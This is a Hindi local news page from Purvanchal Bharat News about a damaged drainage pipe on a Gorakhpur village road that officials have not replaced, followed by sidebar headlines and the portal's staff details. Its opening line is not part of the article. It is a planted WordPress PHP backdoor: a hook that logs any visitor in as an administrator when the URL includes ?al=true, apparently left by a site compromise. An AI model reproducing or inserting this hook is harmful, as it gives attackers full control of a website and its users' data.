// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); मुख्यमंत्री के शहर के अधिकारी उदासीन, शिकायत के बाद भी नहीं बदला ह्यूम पाइप - Purvanchal Bharat News
Connect with us

अपना शहर

मुख्यमंत्री के शहर के अधिकारी उदासीन, शिकायत के बाद भी नहीं बदला ह्यूम पाइप

Published

on

गोरखपुर (उरुवा बाजार)।
उरुवा के धुरियापार मुख्य मार्ग पर ग्राम सभा बेलासपुर में ग्रामीणों द्वारा जल निकासी के लिए वैकल्पिक व्यवस्था के तहत लगाया गया ह्यूम पाइप दोनों सिरे पर बुरी तरह क्षतिग्रस्त हो गया है। जिसके चलते उक्त स्थान पर वाहनों के आवागमन के दौरान छोटे-मोटे हादसे से तो बराबर होते रहते हैं परंतु यहां कभी भी कोई बड़ा हादसा हो सकता है।

प्रदेश के मुखिया योगी आदित्यनाथ के शहर के इस रोड की दशा यह है कि समस्या के समाधान के बजाय अधिकारी सिर्फ आश्वाशन दे कर बड़ी घटना के इंतजार में हैं।अधीक्षण अभियंता द्वारा दिए गए आश्वासन के एक पखवारे से अधिक समय बीत जाने के बाद बाद भी  क्षतिग्रस्त ह्यूम पाइप नहीं बदला गया।जबकि क्षेत्रीय जनप्रतिनिधिओं का भी  उक्त मार्ग से आवागमन हो चुका है।परन्तु महिनों से चल रही इस प्रकार की जनसमस्याओं के विषय मे क्षेत्रीय जनप्रतिनिधियों की उदासीनता देखकर यही लगता है कि जनप्रतिनिधियों की यहां की जनता से कोई सरोकार नहीं है।  वर्तमान समय में उक्त ह्यूम पाइप और अधिक क्षतिग्रस्त हो चुका है जिसके चलते उक्त स्थल पर हर समय दुर्घटना की संभावना बनी हुयी है।

बताते चलें कि क्षेत्र के सैकड़ों गांवों के वर्षा के जल निकासी का मुख्य मार्ग अतिक्रमण का शिकार हो चुका है । इसके लिए ग्रामीण पिछली एवं वर्तमान सरकार में फरियाद करते करते थक चुके हैं। वर्तमान सरकार में मुख्यमंत्री दरबार में भी यह मामला कई बार पेश हो चुका है ।लेकिन कोई सुनवाई नहीं हुयी । मजबूर होकर ग्रामीणों ने जल निकासी के लिए वैकल्पिक व्यवस्था के तहत ग्राम बेलासपुर में उरुवा-धुरियापार मुख्य मार्ग पर ह्यूम पाइप डाल दिया। ह्यूम पाइप डालने के पश्चात उसके ऊपर ईट का टुकड़ा एवं कुछ मिट्टी डाली गयी है।परन्तु बड़े वाहनों के आवागमन के चलते उक्त ह्यूम पाइप दोनों तरफ लगभग ढाई फीट के दायरे में बुरी तरह क्षतिग्रस्त हो गया है।जिससे उक्त स्थल पर अक्सर छोटे-मोटे वाहन टैंपू आदि दुर्घटनाग्रस्त हो रहे हैं ट्रैक्टर- ट्राली, ट्रक, कार आदि चारपहिया वाहन बड़ी मुश्किल से किसी तरह निकल रहे हैं। स्थिति यह है कि चार पहिया वाहनों के आवागमन के दौरान उक्त स्थान पर कभी भी कोई बड़ा हादसा हो सकता है। जिसके चलते मार्ग अवरुद्ध भी हो सकता है। उरुवा -धुरियापार मार्ग जनपद के दक्षिणांचल के दर्जनों गांवों के लोगों के आवागमन का मुख्य मार्ग है। क्षेत्रवासियों ने शासन- प्रशासन से ग्राम सभा बेलासपुर में उरुवा- धुरियापार मार्ग पर वैकल्पिक जल निकासी के लिए डाले गये ह्यूम पाइप को निकालकर वहां मार्ग मरम्मत कराने की मांग की है। उक्त विषय में प्रधानमंत्री ग्रामीण सड़क योजना के अधीक्षण अभियंता ने कहा कि मार्ग को अति शीघ्र ठीक करा दिया जाएगा।

Share this with your friends:
Continue Reading
Advertisement

टॉप न्यूज़

ताज़ा ख़बर2 months ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

ताज़ा ख़बर2 months ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

ताज़ा ख़बर2 months ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

Plastic Banknotes news
ताज़ा ख़बर2 months ago

Plastic Banknotes: भारत में जल्द आ सकते हैं प्लास्टिक के नोट, RBI कर रहा तैयारी; जानिए क्या होंगे फायदे

lucknow women hanging
ताज़ा ख़बर2 months ago

लखनऊ में 25 वर्षीय विवाहिता का शव फंदे से लटका मिला, मायके पक्ष ने दहेज हत्या का लगाया आरोप

बिजली तार की चपेट में आने से 3 भैंसों की मौत
गोरखपुर ग्रामीण2 months ago

गोरखपुर में टूटे बिजली तार की चपेट में आने से 3 भैंसों की मौत, पशुपालकों ने मांगा मुआवजा

गोरखपुर में भीषण गर्मी
उत्तर प्रदेश2 months ago

गोरखपुर में भीषण गर्मी का कहर, दोपहर में 41°C पहुंचा तापमान; 28 मई से राहत के संकेत

पीपीगंज गैस न्यूज़
उत्तर प्रदेश2 months ago

पीपीगंज के कोल्हुआ गांव में गैस वितरण पर उठे सवाल, उपभोक्ताओं ने लगाया कम गैस और ज्यादा वसूली का आरोप

गोरखपुर शहर2 months ago

गोरखपुर विश्वविद्यालय में पेड़ों की कटाई पर विवाद, छात्रों ने लगाए गंभीर आरोप

बिजली तार की चपेट में आने से 3 भैंसों की मौत
गोरखपुर ग्रामीण2 months ago

गोरखपुर में टूटे बिजली तार की चपेट में आने से 3 भैंसों की मौत, पशुपालकों ने मांगा मुआवजा

arjun news sikariganj
गोरखपुर ग्रामीण2 months ago

सिकरीगंज में पिकअप-बाइक की आमने-सामने भिड़ंत, युवक की मौत

ताज़ा ख़बर2 months ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

ताज़ा ख़बर2 months ago

दिल्ली समेत उत्तर-पश्चिम भारत में मौसम फिर बदलेगा, IMD का आंधी-बारिश और तेज हवाओं का अलर्ट

गोरखपुर शहर2 months ago

गोरखपुर विश्वविद्यालय में पेड़ों की कटाई पर विवाद, छात्रों ने लगाए गंभीर आरोप

पीपीगंज गैस न्यूज़
उत्तर प्रदेश2 months ago

पीपीगंज के कोल्हुआ गांव में गैस वितरण पर उठे सवाल, उपभोक्ताओं ने लगाया कम गैस और ज्यादा वसूली का आरोप

lucknow women hanging
ताज़ा ख़बर2 months ago

लखनऊ में 25 वर्षीय विवाहिता का शव फंदे से लटका मिला, मायके पक्ष ने दहेज हत्या का लगाया आरोप

ताज़ा ख़बर2 months ago

शपथ लेते ही एक्शन में आए CM शुभेंदु अधिकारी, बंगाल के मुख्य सचिव और DGP से की अहम बैठक

गोरखपुर में भीषण गर्मी
उत्तर प्रदेश2 months ago

गोरखपुर में भीषण गर्मी का कहर, दोपहर में 41°C पहुंचा तापमान; 28 मई से राहत के संकेत

Advertisement

Trending

free counter

हमारे बारे में-

पूर्वांचल भारत न्यूज एक रजिस्टर्ड न्यूज पोर्टल है ।
इसका उद्देश्य पूर्वांचल भारत के साथ ही देश दुनियां की खबरों व जानकारियों को हमारे दर्शकों को रोचक अंदाज में पहुंचना है। युवाओं को रोजगार सम्बन्धित जानकारी के साथ ही हर वर्ग की समस्या को हम उठा सकें यही हमारी प्राथमिकता होगी। इसके अलावा सांस्कृतिक, ऐतिहासिक और जनसमस्याओं से जुड़े समाचारों पर भी हमारा विशेष ध्यान होता है ।


प्रबन्धक / निदेशक:

जे. समरजीत जैसवार

प्रधान सम्पादक :

आदित्य धनराज

सम्पादक : अजय कुमार 

सलाहकार सम्पादक : जे०पी० 

सलाहकार सम्पादक : ब्रिजेन्द्र सिंह 

उपसम्पादक : एस.के. मिश्रा

उपसम्पादक : कमलेश यादव

उपसम्पादक : धीरेन्द्र कुमार

उपसम्पादक : नीतू यादव

सम्पादकीय :  मनीष कुमार

विज्ञापन और प्रसार प्रबन्धक: आदित्य धनराज

Our Visitor

041957
Total views : 49034


प्रधान कार्यालय :

कूड़ाघाट, निकट एम्स हॉस्पिटल मोहद्दीपुर, 

गोरखपुर, उo प्रo । पिन-273008

सम्पादकीय कार्यालय :

राम जानकी मार्ग, उरुवा बाजार, गोरखपुर
पिन-273407

Copyright © 2021. Powered by “PURVANCHAL BHARAT NEWS”

You cannot copy content of this page